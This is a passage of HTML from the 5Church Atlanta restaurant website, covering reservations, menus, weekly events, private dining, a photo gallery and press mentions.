rel="logo" alt="5Church Atlanta"/> </a> </h1> </div> </div> <div class="flexbox__item"> <nav class="navigation navigation--main" id="js-navigation--main"> <h2 class="accessibility">Primary Navigation</h2> <ul class="nav nav--main nav--items-social"> <li> <a class="social-icon" href="https://www.facebook.com/5Church-Atlanta-1473784472918912/" target="_blank"> <i class="icon-5facebook"></i> </a> </li> <li> <a class="social-icon" href="http://twitter.com/5churchATL" target="_blank"> <i class="icon-5twitter"></i> </a> </li> <li> <a class="social-icon" href="http://instagram.com/5churchatlanta/" target="_blank"> <i class="icon-5instagram"></i> </a> </li> <li> <a class="social-icon" href="http://www.youtube.com/channel/UCUAnwO08L-PZ3fcyjNQplpg" target="_blank"> <i class="icon-5youtube"></i> </a> </li> </ul> <ul id="menu-site-navigation" class="nav nav--main nav--items-menu"><li id="menu-item-916" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-916"><a href="#post-205">Reservations</a></li> <li id="menu-item-915" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-915"><a href="#post-206-title">Menu</a></li> <li id="menu-item-1683" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1683"><a href="#events">Events</a></li> <li id="menu-item-922" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-922"><a href="#post-759-title">Private DIning</a></li> <li id="menu-item-1043" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1043"><a href="#post-14-title">Gallery</a></li> <li id="menu-item-1037" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1037"><a href="#post-633-title">Press</a></li> <li id="menu-item-914" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-914"><a href="http://5churchatlanta.com/contact/">Contact</a></li> <li id="menu-item-1914" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1914"><a href="https://order.ritual.co/r/5CHURCHWEB">Order Now</a></li> </ul> <a class="giftcard pixcode pixcode--btn btn btn--small" href="http://5churchatlanta.com/gift-cards/">Gift Cards</a> </nav> </div> </div> <!-- .flexbox --> </div> <!-- .container --> </div> <!-- .site-header --> <header id="post-205-title" class="article__header article__header--page full-height has-no-image" data-type="image"> <div class="container social-container"> <a class="giftcard pixcode pixcode--btn btn btn--small" href="http://5churchatlanta.com/gift-cards/">Gift Cards</a> <ul class="nav nav--main nav--items-social"> <li> <a class="social-icon" href="https://www.facebook.com/5Church-Atlanta-1473784472918912/" target="_blank"> <i class="icon-5facebook"></i> </a> </li> <li> <a class="social-icon" href="http://twitter.com/5churchATL" target="_blank"> <i class="icon-5twitter"></i> </a> </li> <li> <a class="social-icon" href="http://instagram.com/5churchatlanta/" target="_blank"> <i class="icon-5instagram"></i> </a> </li> <li> <a class="social-icon" href="http://www.youtube.com/channel/UCUAnwO08L-PZ3fcyjNQplpg" target="_blank"> <i class="icon-5youtube"></i> </a> </li> </ul> </div> <div class="article__parallax bg-video"> <!-- <video poster="http://5churchatlanta.com/wp-content/themes/rosa-child/videos/map.jpg" autoplay="autoplay" loop="loop" controls="ad" muted> --> <video autoplay="autoplay" loop="loop" controls="ad"> <source src="http://5churchatlanta.com/wp-content/themes/rosa-child/videos/5churchATL.mp4" type="video/mp4"> <source src="http://5churchatlanta.com/wp-content/themes/rosa-child/videos/5churchATL.webm" type="video/webm"> <source src="http://5churchatlanta.com/wp-content/themes/rosa-child/videos/5churchATL.ogv" type="video/ogg"> </video> <a href="#" id="videoMute" class="video-mute icon-volume-up"></a> <svg class="blurp--top" width="192" height="61" version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 160.7 61.5" enable-background="new 0 0 160.7 61.5" xml:space="preserve"><path fill="#FFFFFF" d="M80.3,61.5c0,0,22.1-2.7,43.1-5.4s41-5.4,36.6-5.4c-21.7,0-34.1-12.7-44.9-25.4S95.3,0,80.3,0c-15,0-24.1,12.7-34.9,25.4S22.3,50.8,0.6,50.8c-4.3,0-6.5,0,3.5,1.3S36.2,56.1,80.3,61.5z"/></svg><div class="down-arrow down-arrow--bubble"><div class="arrow"></div></div> </div> <div class="flexbox"> <div class="flexbox__item"> <hgroup class="article__headline"> <h1 class="headline__primary">                    </h1> <div class="headline__description"><p><img class="alignnone size-full wp-image-769" src="http://staging.5churchatlanta.com//wp-content/uploads/2014/05/5churchcharlestonvert-full-trans.png" alt="5churchcharlestonvert-full-trans" width="150" height="293" /><br /> <div class="pixcode pixcode--separator separator separator--line-flower separator_color--#d8af70"> <div class="line line--left"></div> <div class="line line--right"></div> <div class="star">&#10043;</div> <div class="arrows"> <div class="arrow arrow--left"></div> <div class="arrow arrow--right"></div> </div> </div> <p><a href="/contact">1197 Peachtree St NE,<br /> Atlanta, GA 30361</a><br /> <a href="tel:4044003669">404-400-3669</a></p> </div> </hgroup> <form id="mc-embedded-subscribe-form-header" class="validate mailchimp-form header" action="//howellskitchenbar.us17.list-manage.com/subscribe/post?u=918a232aa37a3c7fba3d06675&amp;id=21618a8477" method="post" name="mc-embedded-subscribe-form" target="_blank" novalidate="novalidate"> <span class="title">Newsletter</span> <input id="mce-EMAIL-header" class="email header-mce" type="email" name="EMAIL" placeholder="Email Address" value=""> <input id="mc-embedded-subscribe-header" class="wpcf7-form-control wpcf7-submit header-mce" type="submit" name="subscribe" value="Subscribe"> </form> </div> </div> </header> <article id="post-205" class="article--page article--main article--arrow border-simple post-205 page type-page status-publish hentry"> <section id="reservations"class="article__content"> <div class="container"> <section class="page__content js-post-gallery cf"> <div class="pixcode pixcode--grid grid thick-gutter "> <div class="grid__item one-whole palm-one-whole island"> <hgroup class="pixcode pixcode--heading article__headline"> <h2 class="headline__secondary"><span class="first-letter">A</span>n Evening</h2> <h1 class="headline__primary">Out</h1> </hgroup> <div class="pixcode pixcode--separator separator separator--flower">&#10043;</div> <div class="pixcode pixcode--otreservations otreservations "> <div class="otreservation-title-wrapper"> <h4 class="otreservations-title">Make a reservation</h4> <span class="otreservations-subtitle">Powered by OpenTable</span> </div> <form method="get" class="otw-widget-form" action="http://www.opentable.com/restaurant-search.aspx" target="_blank"> <div class="otw-wrapper"> <div class="otw-date-li otw-input-wrap"> <label for="date-otreservations"><i class="icon-calendar"></i></label> <input id="date-otreservations" name="startDate" class="otw-reservation-date" type="text" value="" autocomplete="off"> </div> <div class="otw-time-wrap otw-input-wrap"> <label for="time-otreservations"><i class="icon-clock-o"></i></label> <select id="time-otreservations" name="ResTime" class="otw-reservation-time selectpicker"> <option value="6:00am" >6:00 am</option> <option value="6:30am" >6:30 am</option> <option value="7:00am" >7:00 am</option> <option value="7:30am" >7:30 am</option> <option value="8:00am" >8:00 am</option> <option value="8:30am" >8:30 am</option> <option value="9:00am" >9:00 am</option> <option value="9:30am" >9:30 am</option> <option value="10:00am" >10:00 am</option> <option value="10:30am" >10:30 am</option> <option value="11:00am" >11:00 am</option> <option value="11:30am" >11:30 am</option> <option value="12:00pm" >12:00 pm</option> <option value="12:30pm" >12:30 pm</option> <option value="1:00pm" >1:00 pm</option> <option value="1:30pm" >1:30 pm</option> <option value="2:00pm" >2:00 pm</option> <option value="2:30pm" >2:30 pm</option> <option value="3:00pm" >3:00 pm</option> <option value="3:30pm" >3:30 pm</option> <option value="4:00pm" >4:00 pm</option> <option value="4:30pm" >4:30 pm</option> <option value="5:00pm" >5:00 pm</option> <option value="5:30pm" >5:30 pm</option> <option value="6:00pm" >6:00 pm</option> <option value="6:30pm" >6:30 pm</option> <option value="7:00pm" selected="selected" >7:00 pm</option> <option value="7:30pm" >7:30 pm</option> <option value="8:00pm" >8:00 pm</option> <option value="8:30pm" >8:30 pm</option> <option value="9:00pm" >9:00 pm</option> <option value="9:30pm" >9:30 pm</option> <option value="10:00pm" >10:00 pm</option> <option value="10:30pm" >10:30 pm</option> <option value="11:00pm" >11:00 pm</option> <option value="11:30pm" >11:30 pm</option> </select> </div> <div class="otw-party-size-wrap otw-input-wrap"> <label for="party-otreservations"><i class="icon-user"></i></label> <select id="party-otreservations" name="partySize" class="otw-party-size-select selectpicker"> <option value="1">1 Person</option> <option value="2" selected="selected">2 People</option> <option value="3">3 People</option> <option value="4">4 People</option> <option value="5">5 People</option> <option value="6">6 People</option> <option value="7">7 People</option> <option value="8">8 People</option> <option value="9">9 People</option> <option value="10">10 People</option> </select> </div> <div class="otw-button-wrap"> <input type="submit" class="otreservations-submit" value="Find a Table" /> </div> <input type="hidden" name="RestaurantID" class="RestaurantID" value="211492"> <input type="hidden" name="rid" class="rid" value="211492"> <input type="hidden" name="GeoID" class="GeoID" value="15"> <input type="hidden" name="txtDateFormat" class="txtDateFormat" value="MM/DD/YYYY"> <input type="hidden" name="RestaurantReferralID" class="RestaurantReferralID" value="211492"> </div> </form> </div> </div> </div> <p>&nbsp;</p> </section> </div> </section> </article> <header id="post-206-title" class="article__header article__header--page two-thirds-height" data-type="image"> <div id="taste-our-menu-(homepage-selected-menu-items)" class="article__parallax"> <img class="article__parallax__img" src="http://5churchatlanta.com/wp-content/uploads/2015/07/tasteourmenuheader-2048x1098.jpeg" alt="Taste Our Menu (Homepage Selected Menu Items)"/> </div> <div class="flexbox"> <div class="flexbox__item"> <hgroup class="article__headline"> <h2 class="headline__secondary"><span class="first-letter">T</span>aste</h2> <h1 class="headline__primary">Our Menu</h1> </hgroup> </div> </div> </header> <article id="post-206" class="article--page article--main article--subpage border-simple post-206 page type-page status-publish has-post-thumbnail hentry"> <section class="article__content" > <div class="container"> <section class="page__content js-post-gallery cf"> <div class="pixcode pixcode--grid grid menu-grid"> <div class="grid__item six-twelfths palm-one-whole "> <figure id="attachment_1598" style="width: 1000px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2015/12/dinner-menu-5.8.19.pdf" target="_blank" rel="attachment wp-att-1598 noopener"><img class="wp-image-1598 size-full" src="http://5churchatlanta.com/wp-content/uploads/2014/05/crab-dinner.jpg" alt="" width="1000" height="562" /></a><figcaption class="wp-caption-text">Dinner</figcaption></figure> </div> <div class="grid__item six-twelfths palm-one-whole "> <figure id="attachment_931" style="width: 1000px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2015/12/cocktails-0918.pdf" target="_blank" rel="noopener"><img class="wp-image-931 size-full" title="Drinks" src="http://5churchatlanta.com/wp-content/uploads/2014/05/drinks.jpg" alt="Drinks" width="1000" height="562" /></a><figcaption class="wp-caption-text">Drinks</figcaption></figure> </div> </div> <div class="pixcode pixcode--grid grid menu-grid"> <div class="grid__item six-twelfths palm-one-whole "> <figure id="attachment_1610" style="width: 1000px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2015/12/brunch-menu-nov-2018.pdf"><img class="wp-image-1610 size-full" title="Brunch" src="http://5churchatlanta.com/wp-content/uploads/2014/05/brunch.jpg" alt="Brunch" width="1000" height="562" srcset="http://5churchatlanta.com/wp-content/uploads/2014/05/brunch.jpg 1000w, http://5churchatlanta.com/wp-content/uploads/2014/05/brunch-300x169.jpg 300w, http://5churchatlanta.com/wp-content/uploads/2014/05/brunch-900x506.jpg 900w, http://5churchatlanta.com/wp-content/uploads/2014/05/brunch-400x225.jpg 400w, http://5churchatlanta.com/wp-content/uploads/2014/05/[email protected] 600w, http://5churchatlanta.com/wp-content/uploads/2014/05/[email protected] 800w" sizes="(max-width: 1000px) 100vw, 1000px" /></a><figcaption class="wp-caption-text">Brunch</figcaption></figure> </div> <div class="grid__item six-twelfths palm-one-whole "> <figure id="attachment_1613" style="width: 1000px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2015/12/lunch-menu-09.17.18-rotated.pdf"><img class="wp-image-1613 size-full" title="Lunch" src="http://5churchatlanta.com/wp-content/uploads/2014/05/lunch-1.jpg" alt="Lunch" width="1000" height="562" /></a><figcaption class="wp-caption-text">Lunch</figcaption></figure> </div> </div> <div class="pixcode pixcode--grid grid menu-grid"> <div class="grid__item six-twelfths palm-one-whole "> <figure id="attachment_1634" style="width: 1000px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2014/05/social-hour-final-1.25.18.pdf" target="_blank" rel="noopener"><img class="wp-image-1634 size-full" src="http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1.jpeg" alt="Social Hour" width="1000" height="563" srcset="http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1.jpeg 1000w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-300x169.jpeg 300w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-900x507.jpeg 900w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-400x225.jpeg 400w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-300x169@2x.jpeg 600w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-400x225@2x.jpeg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /></a><figcaption class="wp-caption-text">Social Hour</figcaption></figure> </div> <div class="grid__item six-twelfths palm-one-whole "> <figure id="attachment_1660" style="width: 1000px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2015/12/ramenmondaymenufinal.pdf" rel="attachment wp-att-1066"><img class="wp-image-1660 size-full" title="Ramen Mondays" src="http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night.jpg" alt="" width="1000" height="562" srcset="http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night.jpg 1000w, http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night-300x169.jpg 300w, http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night-900x506.jpg 900w, http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night-400x225.jpg 400w, http://5churchatlanta.com/wp-content/uploads/2014/05/[email protected] 600w, http://5churchatlanta.com/wp-content/uploads/2014/05/[email protected] 800w" sizes="(max-width: 1000px) 100vw, 1000px" /></a><figcaption class="wp-caption-text">Ramen Mondays</figcaption></figure> </div> </div> <p>&nbsp;</p> <figure id="attachment_2124" style="width: 532px" class="wp-caption aligncenter"><a href="http://5churchatlanta.com/wp-content/uploads/2015/12/rooftop-menu.jpg"><img class="wp-image-2124" title="ROOFTOP" src="http://5churchatlanta.com/wp-content/uploads/2014/05/20190426_174040.jpg" alt="ROOFTOP" width="532" height="399" /></a><figcaption class="wp-caption-text">ROOFTOP</figcaption></figure> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </section> </div> </section> </article> <header id="post-1645-title" class="article__header article__header--page two-thirds-height" data-type="image"> <div id="events" class="article__parallax"> <img class="article__parallax__img" src="http://5churchatlanta.com/wp-content/uploads/2018/01/there-is-only-we.jpg" alt="Events"/> </div> <div class="flexbox"> <div class="flexbox__item"> <hgroup class="article__headline"> <h2 class="headline__secondary"><span class="first-letter">E</span>vents</h2> <h1 class="headline__primary">Events</h1> </hgroup> </div> </div> </header> <article id="post-1645" class="article--page article--main article--subpage border-simple post-1645 page type-page status-publish has-post-thumbnail hentry"> <section class="article__content" > <div class="container"> <section class="page__content js-post-gallery cf"> <h1 style="text-align: center;">Mother&#8217;s Day</h1> <p style="text-align: center;">May 12th</p> <p style="text-align: center;">Buffet 10:30 a.m. &#8211; 5 p.m.</p> <p style="text-align: center;">$40 adults  |   $18 kids 12 and under</p> <p style="text-align: center;">Dinner service starts at 6 p.m.</p> <p style="text-align: center;"><a href="http://5churchatlanta.com/wp-content/uploads/2018/01/mothers-day-menu.png"><img class="aligncenter wp-image-2091" src="http://5churchatlanta.com/wp-content/uploads/2018/01/mothersday-brunch-4.jpg" alt="" width="434" height="325" srcset="http://5churchatlanta.com/wp-content/uploads/2018/01/mothersday-brunch-4.jpg 1200w, http://5churchatlanta.com/wp-content/uploads/2018/01/mothersday-brunch-4-300x225.jpg 300w, http://5churchatlanta.com/wp-content/uploads/2018/01/mothersday-brunch-4-1024x768.jpg 1024w, http://5churchatlanta.com/wp-content/uploads/2018/01/mothersday-brunch-4-900x675.jpg 900w, http://5churchatlanta.com/wp-content/uploads/2018/01/mothersday-brunch-4-400x300.jpg 400w, http://5churchatlanta.com/wp-content/uploads/2018/01/[email protected] 600w, http://5churchatlanta.com/wp-content/uploads/2018/01/[email protected] 800w" sizes="(max-width: 434px) 100vw, 434px" /></a><a href="http://5churchatlanta.com/wp-content/uploads/2018/01/mothers-day-menu.png">Menu</a></p> <p style="text-align: center;">$25 per person missing guest fee within 48 hrs &#8211; Cancellation policy</p> <hr /> <h1 class="p1" style="text-align: center;">Rooftop Sunset Party</h1> <h4 style="text-align: center;">Every Friday and Saturday night</h4> <p style="text-align: center;">8 p.m. &#8211; 1 a.m.</p> <p style="text-align: center;">Lite bites and cocktails</p> <p style="text-align: center;">DJ&#8217;s every weekend Rooftop opens at 5 p.m. Monday &#8211; Sunday</p> <p style="text-align: center;"><a href="http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011.jpg"><img class="aligncenter wp-image-2087" src="http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011.jpg" alt="" width="396" height="264" srcset="http://5churchatlanta.com/wp-content/uploads/2018/01/[email protected] 2048w, http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011-300x200.jpg 300w, http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011-1024x683.jpg 1024w, http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011-1200x800.jpg 1200w, http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011-900x600.jpg 900w, http://5churchatlanta.com/wp-content/uploads/2018/01/20180728_5church_sat_bm_0011-400x267.jpg 400w, http://5churchatlanta.com/wp-content/uploads/2018/01/[email protected] 600w, http://5churchatlanta.com/wp-content/uploads/2018/01/[email protected] 1800w, http://5churchatlanta.com/wp-content/uploads/2018/01/[email protected] 800w" sizes="(max-width: 396px) 100vw, 396px" /></a>Rooftop opens at 5 p.m. Monday &#8211; Sunday</p> <hr /> <h1 class="p1" style="text-align: center;"><strong>Mondays: </strong>Ramen Mondays</h1> <p><a href="http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night.jpg"><img class="aligncenter wp-image-1660" src="http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night.jpg" alt="" width="413" height="232" srcset="http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night.jpg 1000w, http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night-300x169.jpg 300w, http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night-900x506.jpg 900w, http://5churchatlanta.com/wp-content/uploads/2014/05/ramen-night-400x225.jpg 400w, http://5churchatlanta.com/wp-content/uploads/2014/05/[email protected] 600w, http://5churchatlanta.com/wp-content/uploads/2014/05/[email protected] 800w" sizes="(max-width: 413px) 100vw, 413px" /></a></p> <p style="text-align: center;">Starting at 5:00 p.m.</p> <hr /> <h1 class="p1" style="text-align: center;"><strong>Monday &#8211; Thursday: </strong></h1> <p class="p1" style="text-align: center;">Social Hour 4:30pm &#8211; 6:30pm<strong> </strong></p> <p><a href="http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1.jpeg"><img class="aligncenter wp-image-1634" src="http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1.jpeg" alt="" width="407" height="229" srcset="http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1.jpeg 1000w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-300x169.jpeg 300w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-900x507.jpeg 900w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-400x225.jpeg 400w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-300x169@2x.jpeg 600w, http://5churchatlanta.com/wp-content/uploads/2014/05/short-rib-sliders-pretzel-bun-pickled-red-onion-housemade-bbq-sauce-9_preview-1-400x225@2x.jpeg 800w" sizes="(max-width: 407px) 100vw, 407px" /></a></p> <p>&nbsp;</p> <hr /> <p>&nbsp;</p> <p>&nbsp;</p> </section> </div> </section> </article> <header id="post-759-title" class="article__header article__header--page half-height" data-type="image"> <div id="private-dining" class="article__parallax"> <img class="article__parallax__img" src="http://5churchatlanta.com/wp-content/uploads/2015/08/private-dining-header-high-res-2048x1365.jpg" alt="Private Dining"/> </div> <div class="flexbox"> <div class="flexbox__item"> <hgroup class="article__headline"> <h2 class="headline__secondary"><span class="first-letter">P</span>rivate</h2> <h1 class="headline__primary">Dining</h1> </hgroup> </div> </div> </header> <article id="post-759" class="article--page article--main article--subpage border-simple post-759 page type-page status-publish has-post-thumbnail hentry"> <section class="article__content" > <div class="container"> <section class="page__content js-post-gallery cf"> <h3 id="private-dining" class="flush--top">Private Dining &amp; Events</h3> <div class="pixcode pixcode--grid grid "> <div class="grid__item seven-twelfths palm-one-whole "> <p>5Church’s cutting edge interior design &amp; sophisticated ambiance is the perfect setting for your next corporate, social, or charitable event. Whether an intimate dinner party or an extravagant gala for 250 or more, our staff can create a truly memorable experience for you and your guests. Please contact our sales staff for details and availability.</p> </div> <div class="grid__item five-twelfths palm-one-whole "> <script type="text/javascript" src="https://gatherhere.com/js/leadform.js" id="gather-loader" data-advanced></script></p> <h5><div class="pixcode pixcode--separator separator separator--flower">&#10043;</div> <a href="https://gatherhere.com/inquiries/a9yv3mic" id="gather-loader">Book Your Event</a></h5> <h5><div class="pixcode pixcode--separator separator separator--flower">&#10043;</div> <a href="mailto:[email protected]">[email protected]</a></h5> <h5><div class="pixcode pixcode--separator separator separator--flower">&#10043;</div> <a href="tel:4044003669">404-400-3669</a></h5> <a class="pixcode pixcode--btn btn btn--small" href="http://5churchatlanta.com//private-dining-options/" >View all Private Dining options</a> <script type="text/javascript" src="https://gatherhere.com/js/leadform.js" id="gather-loader" data-locationid="pmcii0mz" data-trigger="eventButton"></script></p> </div> </div> </section> </div> </section> </article> <header id="post-14-title" class="article__header article__header--page half-height" data-type="image"> <div id="photo-gallery" class="article__parallax"> <img class="article__parallax__img" src="http://5churchatlanta.com/wp-content/uploads/2015/07/photo-gallery-header-high-res-2048x1365.jpg" alt="Photo Gallery"/> </div> <div class="flexbox"> <div class="flexbox__item"> <hgroup class="article__headline"> <h2 class="headline__secondary"><span class="first-letter">P</span>hoto</h2> <h1 class="headline__primary">Gallery</h1> </hgroup> </div> </div> </header> <article id="post-14" class="article--page article--main article--subpage border-simple post-14 page type-page status-publish has-post-thumbnail hentry"> <section class="article__content" > <div class="container"> <section class="page__content js-post-gallery cf"> <ul class="gallery"> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/1197cocktail-3_preview-1024x683.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/1197cocktail-3_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/crab-2_preview-683x1024.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/crab-2_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/crabsalad-3_preview-1024x683.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/crabsalad-3_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/rooftop.png" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/rooftop-300x300.png, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/quinoa-3_preview-683x1024.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/quinoa-3_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/image1tablescape-1024x994.jpg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/image1tablescape-300x300.jpg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/holy-water-call-me-earl-the-art-of-war-viper-8_preview-1024x683.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/holy-water-call-me-earl-the-art-of-war-viper-8_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/holy-water-call-me-earl-the-art-of-war-viper-8_preview-300x300@2x.jpeg 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/octopus-1_preview-1024x683.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/octopus-1_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/porterhouse_preview-1024x683.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/porterhouse_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchatl_interior_5_preview.jpeg" data-featherlight="image"> <div class="image"> <img src="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchatl_interior_5_preview-300x300.jpeg"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchatl_holywater_2_preview-1024x682.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchatl_holywater_2_preview-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> <li class="gallery-image"> <a href="http://5churchatlanta.com/wp-content/uploads/2015/07/tasteourmenuheader-1024x549.jpeg" data-featherlight="image"> <div class="image"> <img srcset="http://5churchatlanta.com/wp-content/uploads/2015/07/tasteourmenuheader-300x300.jpeg, http://5churchatlanta.com/wp-content/uploads/2015/07/[email protected] 2x"> </div> </a> </li> </ul> </section> </div> </section> </article> <header id="post-633-title" class="article__header article__header--page half-height" data-type="image"> <div id="in-the-press" class="article__parallax"> <img class="article__parallax__img" src="http://5churchatlanta.com/wp-content/uploads/2015/07/in-the-press-header-high-res-2048x1365.jpg" alt="In The Press"/> </div> <div class="flexbox"> <div class="flexbox__item"> <hgroup class="article__headline"> <h2 class="headline__secondary"><span class="first-letter">I</span>n The</h2> <h1 class="headline__primary">Press</h1> </hgroup> </div> </div> </header> <article id="post-633" class="article--page article--main article--subpage border-simple post-633 page type-page status-publish has-post-thumbnail hentry"> <section class="article__content" > <div class="container"> <section class="page__content js-post-gallery cf"> <ul class="press-mentions"> <li class="press-mention"> <div class="quick-quote"> <i class="icon-5left-quote"></i> <p> 5Church Atlanta is the recipient of  Trip Expert's 2019 Experts' Choice Award!</p> </div> <a href="#" data-featherlight="#expert&#8217;s-choice-2019-window"> <img src="http://5churchatlanta.com/wp-content/uploads/2019/05/expert-e1557417345739.png"> </a> <div id="expert&#8217;s-choice-2019-window" class="press-window"> <br><p><a class="pixcode pixcode--btn btn featherlight-close" href="#">Close</a></p> </div> </li> <li class="press-mention"> <div class="quick-quote"> <i class="icon-5left-quote"></i> <p></p> </div> <a href="#" data-featherlight="#jezebel-2019-window"> <img src="http://5churchatlanta.com/wp-content/uploads/2019/04/jezebel-2019-best-of-atlanta.jpg"> </a> <div id="jezebel-2019-window" class="press-window"> <br><p><a class="pixcode pixcode--btn btn featherlight-close" href="#">Close</a></p> </div> </li> <li class="press-mention"> <div class="quick-quote"> <i class="icon-5left-quote"></i> <p>14 Must-Visit Rooftop Bars & Restaurants in Atlanta</p> </div> <a href="#" data-featherlight="#zagat-window"> <img src="http://5churchatlanta.com/wp-content/uploads/2017/09/images-1.png"> </a> <div id="zagat-window" class="press-window"> <a href="http://5churchatlanta.com/?attachment_id=1493" rel="attachment wp-att-1493"><img class="aligncenter size-full wp-image-1493" 